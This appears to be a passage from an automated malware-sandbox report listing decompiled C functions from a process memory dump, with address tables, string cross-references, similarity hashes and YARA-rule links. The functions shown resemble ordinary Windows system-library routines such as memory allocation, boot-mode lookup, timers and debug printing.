				_t179 = __ecx;
				_v48 = __edx;
				_v68 = 0;
				_v72 = 0;
				_push(__ecx[1]);
				_push( *__ecx);
				_push(0);
				_t153 = 0x14;
				_t135 = _t153;
				_t132 = E011BBBBB(_t135, _t153);
				if(_t132 == 0) {
					_t166 = _v68;
					goto L43;
				} else {
					_t155 = 0;
					_v52 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v56 = __ecx[1];
					if( *__ecx >> 8 < 2) {
						_t155 = 1;
						_v52 = 1;
					}
					_t139 = _a4;
					_t87 = (_t155 << 0xc) + _t139;
					_v60 = _t87;
					if(_t87 < _t139) {
						L11:
						_t166 = _v68;
						L12:
						if(_t132 != 0) {
							E011BBCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
						}
						L43:
						if(_v72 != 0) {
							_push( *((intOrPtr*)(_t179 + 4)));
							_push( *_t179);
							_push(0x8000);
							E011BAFDE( &_v72,  &_v60);
						}
						L46:
						return _t166;
					}
					_t90 =  *(_t179 + 0xc) & 0x40000000;
					asm("sbb edi, edi");
					_t172 = ( ~_t90 & 0x0000003c) + 4;
					if(_t90 != 0) {
						_push(0);
						_push(0x14);
						_push( &_v44);
						_push(3);
						_push(_t179);
						_push(0xffffffff);
						if(E01139730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
							_push(_t139);
							E011BA80D(_t179, 1, _v40, 0);
							_t172 = 4;
						}
					}
					_t141 =  &_v72;
					if(E011BA854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
						_v64 = _a4;
						_t94 =  *(_t179 + 0xc) & 0x40000000;
						asm("sbb edi, edi");
						_t176 = ( ~_t94 & 0x0000003c) + 4;
						if(_t94 != 0) {
							_push(0);
							_push(0x14);
							_push( &_v24);
							_push(3);
							_push(_t179);
							_push(0xffffffff);
							if(E01139730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
								_push(_t141);
								E011BA80D(_t179, 1, _v20, 0);
								_t176 = 4;
							}
						}
						if(E011BA854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
							goto L11;
						} else {
							_t177 = _v64;
							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
							_t100 = _v52 + _v52;
							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
							 *(_t132 + 0x10) = _t146;
							asm("bsf eax, [esp+0x18]");
							_v52 = _t100;
							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
							_t47 =  &_a8;
							 *_t47 = _a8 & 0x00000001;
							if( *_t47 == 0) {
								E01112280(_t179 + 0x30, _t179 + 0x30);
							}
							_t147 =  *(_t179 + 0x34);
							_t159 =  *(_t179 + 0x38) & 1;
							_v68 = 0;
							if(_t147 == 0) {
								L35:
								E0110B090(_t179 + 0x34, _t147, _v68, _t132);
								if(_a8 == 0) {
									E0110FFB0(_t132, _t177, _t179 + 0x30);
								}
								asm("lock xadd [eax], ecx");
								asm("lock xadd [eax], edx");
								_t132 = 0;
								_v72 = _v72 & 0;
								_v68 = _v72;
								if(E01117D50() == 0) {
									_t113 = 0x7ffe0388;
								} else {
									_t177 = _v64;
									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
								}
								if( *_t113 == _t132) {
									_t166 = _v68;
									goto L46;
								} else {
									_t166 = _v68;
									E011AFEC0(_t132, _t179, _t166, _t177 + 0x1000);
									goto L12;
								}
							} else {
								L23:
								while(1) {
									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
										_t122 =  *_t147;
										if(_t159 == 0) {
											L32:
											if(_t122 == 0) {
												L34:
												_v68 = 0;
												goto L35;
											}
											L33:
											_t147 = _t122;
											continue;
										}
										if(_t122 == 0) {
											goto L34;
										}
										_t122 = _t122 ^ _t147;
										goto L32;
									}
									_t122 =  *(_t147 + 4);
									if(_t159 == 0) {
										L27:
										if(_t122 != 0) {
											goto L33;
										}
										L28:
										_v68 = 1;
										goto L35;
									}
									if(_t122 == 0) {
										goto L28;
									}
									_t122 = _t122 ^ _t147;
									goto L27;
								}
							}
						}
					}
					_v72 = _v72 & 0x00000000;
					goto L11;
				}
			}

0x011be547
0x011be549
0x011be54f
0x011be553
0x011be557
0x011be55a
0x011be55c
0x011be55f
0x011be561
0x011be567
0x011be56b
0x011be7e2
0x00000000
0x011be571
0x011be575
0x011be577
0x011be57b
0x011be57c
0x011be57d
0x011be57e
0x011be57f
0x011be588
0x011be58f
0x011be591
0x011be592
0x011be592
0x011be596
0x011be59e
0x011be5a0
0x011be5a6
0x011be61d
0x011be61d
0x011be621
0x011be623
0x011be630
0x011be630
0x011be7e6
0x011be7eb
0x011be7ed
0x011be7f4
0x011be7fa
0x011be7ff
0x011be7ff
0x011be80a
0x011be812
0x011be812
0x011be5ab
0x011be5b4
0x011be5b9
0x011be5be
0x011be5c0
0x011be5c2
0x011be5c8
0x011be5c9
0x011be5cb
0x011be5cc
0x011be5d5
0x011be5e4
0x011be5f1
0x011be5f8
0x011be5f8
0x011be5d5
0x011be602
0x011be616
0x011be63d
0x011be644
0x011be64d
0x011be652
0x011be657
0x011be659
0x011be65b
0x011be661
0x011be662
0x011be664
0x011be665
0x011be66e
0x011be67d
0x011be68a
0x011be691
0x011be691
0x011be66e
0x011be6b0
0x00000000
0x011be6b6
0x011be6bd
0x011be6c7
0x011be6d7
0x011be6d9
0x011be6db
0x011be6de
0x011be6e3
0x011be6f3
0x011be6fc
0x011be700
0x011be700
0x011be704
0x011be70a
0x011be70a
0x011be713
0x011be716
0x011be719
0x011be720
0x011be761
0x011be76b
0x011be774
0x011be77a
0x011be77a
0x011be78a
0x011be791
0x011be799
0x011be79b
0x011be79f
0x011be7aa
0x011be7c0
0x011be7ac
0x011be7b2
0x011be7b9
0x011be7b9
0x011be7c7
0x011be806
0x00000000
0x011be7c9
0x011be7d1
0x011be7d8
0x00000000
0x011be7d8
0x00000000
0x00000000
0x011be722
0x011be72e
0x011be748
0x011be74c
0x011be754
0x011be756
0x011be75c
0x011be75c
0x00000000
0x011be75c
0x011be758
0x011be758
0x00000000
0x011be758
0x011be750
0x00000000
0x00000000
0x011be752
0x00000000
0x011be752
0x011be730
0x011be735
0x011be73d
0x011be73f
0x00000000
0x00000000
0x011be741
0x011be741
0x00000000
0x011be741
0x011be739
0x00000000
0x00000000
0x011be73b
0x00000000
0x011be73b
0x011be722
0x011be720
0x011be6b0
0x011be618
0x00000000
0x011be618

Strings

`, xrefs: 011BE670
`, xrefs: 011BE5D7

Memory Dump Source

Source File: 00000009.00000002.380101220.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: true

Similarity

API ID:
String ID: `$`
API String ID: 0-197956300
Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
Instruction ID: bdf33cf97a1e5a86b7fc64e534225345987eac89c8fa6a8920153e4bd7ae8ec4
Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
Instruction Fuzzy Hash: 049180312057429FE729CF29C981B9BBBE5AF84714F14892DF695CB280E774E904CB92

Uniqueness

Uniqueness Score: -1.00%

Function 011751BE, Relevance: 2.7, Strings: 2, Instructions: 173
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E011751BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0x11d05f0);
				E0114D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E0110EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E011753CA(0);
						return E0114D130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E0113F3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E01113690(1, _t117, 0x10d1810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E0113AA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L01114620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E0113AA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E0117500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E01139860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}

0x011751be
0x011751c3
0x011751c8
0x011751cd
0x011751d0
0x011751d3
0x011751d8
0x011751db
0x011751de
0x011751e0
0x011751e3
0x011751e6
0x011751e8
0x01175342
0x01175351
0x01175356
0x0117535a
0x01175360
0x01175363
0x01175366
0x01175369
0x01175369
0x0117536b
0x0117536b
0x01175370
0x011753a3
0x011753a4
0x011753a6
0x011753ab
0x011753ab
0x011753ae
0x011753ae
0x011753b5
0x011753bf
0x011753bf
0x01175375
0x01175396
0x011753a0
0x011753a0
0x00000000
0x01175396
0x01175377
0x01175379
0x0117537f
0x0117538c
0x01175390
0x00000000
0x01175390
0x011751ee
0x011751f1
0x01175301
0x01175310
0x01175315
0x01175318
0x0117531b
0x01175320
0x0117532e
0x01175331
0x00000000
0x01175331
0x01175328
0x01175329
0x00000000
0x01175329
0x011751fa
0x01175235
0x01175236
0x01175239
0x0117523f
0x01175240
0x01175241
0x01175242
0x01175246
0x01175247
0x0117524e
0x01175251
0x01175267
0x01175269
0x0117526e
0x0117527d
0x0117527e
0x01175281
0x01175282
0x01175287
0x01175288
0x0117528a
0x0117528f
0x01175294
0x00000000
0x00000000
0x0117529a
0x0117529c
0x0117529e
0x0117529e
0x011752a4
0x011752b0
0x00000000
0x00000000
0x011752ba
0x011752bc
0x011752bc
0x011752d4
0x011752d9
0x011752dc
0x011752e1
0x00000000
0x00000000
0x011752e7
0x011752f4
0x00000000
0x011752f4
0x01175270
0x00000000
0x01175270
0x011751fc
0x011751fd
0x01175202
0x01175203
0x01175205
0x0117520a
0x0117520f
0x00000000
0x00000000
0x0117521b
0x01175226
0x0117522b
0x0117521d
0x0117521d
0x01175222
0x01175222
0x0117522d
0x00000000

Strings

UEFI, xrefs: 0117521D
Legacy, xrefs: 01175226

Memory Dump Source

Source File: 00000009.00000002.380101220.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID: Legacy$UEFI
API String ID: 2994545307-634100481
Opcode ID: a2baf3dbd2b4dfa1b03c9fe0b6ddc776a13d4458d0ffeedbae57c2deebdd426b
Instruction ID: e1e92c50bcfc9d9d616a09583041841d6beb51094589bbc025a08524663f00f1
Opcode Fuzzy Hash: a2baf3dbd2b4dfa1b03c9fe0b6ddc776a13d4458d0ffeedbae57c2deebdd426b
Instruction Fuzzy Hash: B6516BB1E046099FDB68DFA8C940AADBBBAFF48704F15402DE649EB351DB709901CB10

Uniqueness

Uniqueness Score: -1.00%

Function 0111B944, Relevance: 1.7, APIs: 1, Instructions: 166
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E0111B944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0x11ed360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E01117D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E011C8CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E01139E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E0113B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E0113CE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E01117D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E011C8F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E0113AF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0x11e8628; // 0x0
								_v68 = _t77;
								_t78 =  *0x11e862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0x11e8628; // 0x0
							_t116 =  *0x11e862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}

0x0111b94c
0x0111b956
0x0111b95c
0x0111b95e
0x0111b964
0x0111b969
0x0111b96d
0x0111b96d
0x0111b970
0x0111b974
0x0111b97a
0x0111badf
0x0111badf
0x0111bae2
0x0111bae4
0x0111bae6
0x0111baf0
0x01162cb8
0x0111baf6
0x0111baf6
0x0111baf6
0x0111bafd
0x0111bb1f
0x0111bb1f
0x0111baff
0x0111bb00
0x0111bb00
0x0111bb03
0x0111bb03
0x0111bacb
0x0111bacf
0x0111bad0
0x0111bad1
0x0111badc
0x0111badc
0x0111b980
0x0111b980
0x0111b988
0x0111b98b
0x0111b98d
0x0111b990
0x0111b993
0x0111b999
0x0111b99b
0x0111b9a1
0x0111b9a5
0x0111b9aa
0x0111b9b0
0x0111b9bb
0x0111b9c0
0x0111b9c3
0x0111b9ca
0x0111b9cc
0x0111b9cf
0x0111b9d3
0x0111b9d7
0x0111ba94
0x0111ba94
0x0111ba98
0x0111baa3
0x01162ccb
0x0111baa9
0x0111baa9
0x0111baa9
0x0111bab1
0x01162cd5
0x01162cdd
0x01162cdd
0x0111babb
0x0111babc
0x0111bac2
0x0111bac3
0x0111bac3
0x0111bac6
0x00000000
0x0111b9dd
0x0111b9dd
0x0111b9e7
0x0111b9e7
0x0111b9ec
0x0111b9ec
0x0111b9f1
0x0111b9f5
0x0111b9fa
0x0111ba00
0x0111ba0c
0x0111ba10
0x0111ba10
0x0111ba12
0x0111ba18
0x00000000
0x00000000
0x0111bb26
0x0111bb26
0x0111ba1e
0x0111ba1e
0x0111ba23
0x0111ba25
0x0111ba2c
0x0111ba30
0x0111ba35
0x0111ba35
0x0111ba41
0x0111ba46
0x0111ba4c
0x0111ba50
0x0111ba54
0x0111ba6a
0x0111ba6e
0x0111ba70
0x0111ba74
0x0111ba78
0x0111ba7a
0x0111ba7c
0x0111ba8e
0x0111ba90
0x0111ba92
0x0111bb14
0x0111bb14
0x0111bb16
0x0111bb16
0x00000000
0x0111ba7c
0x0111bb0a
0x0111bb0d
0x00000000
0x00000000
0x00000000
0x0111bb0f

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0111B9A5

Memory Dump Source

Source File: 00000009.00000002.380101220.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: true

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 885266447-0
Opcode ID: 6c5e5083ced099253867167390d2832bf34abecff27d9f7dc1eb4eb60d608da5
Instruction ID: 5470754f3c01a15653a8aea15f1e5a21db42996ecf751c3eb08a619ffa7e20e1
Opcode Fuzzy Hash: 6c5e5083ced099253867167390d2832bf34abecff27d9f7dc1eb4eb60d608da5
Instruction Fuzzy Hash: 75515871A08345CFC728DF68D08092AFBF5FB88604F15497EE99597359E731E840CB96

Uniqueness

Uniqueness Score: -1.00%

Function 010FB171, Relevance: 1.7, APIs: 1, Instructions: 166
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E010FB171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0x11cf7a8);
				E0114D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E0114D130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E0113D000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E0113F3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											L0114DEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E0113B280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E0113B7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E0113E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E0113A890() != 0) {
					goto L6;
				}
				goto L3;
			}

0x010fb171
0x010fb171
0x010fb171
0x010fb171
0x010fb171
0x010fb176
0x010fb17b
0x010fb180
0x010fb186
0x010fb18f
0x010fb198
0x010fb1a4
0x010fb1aa
0x01154802
0x01154802
0x01154805
0x0115480c
0x0115480e
0x010fb1d1
0x010fb1d3
0x010fb1de
0x010fb1de
0x01154817
0x0115481e
0x01154820
0x01154822
0x01154822
0x01154824
0x01154824
0x0115482a
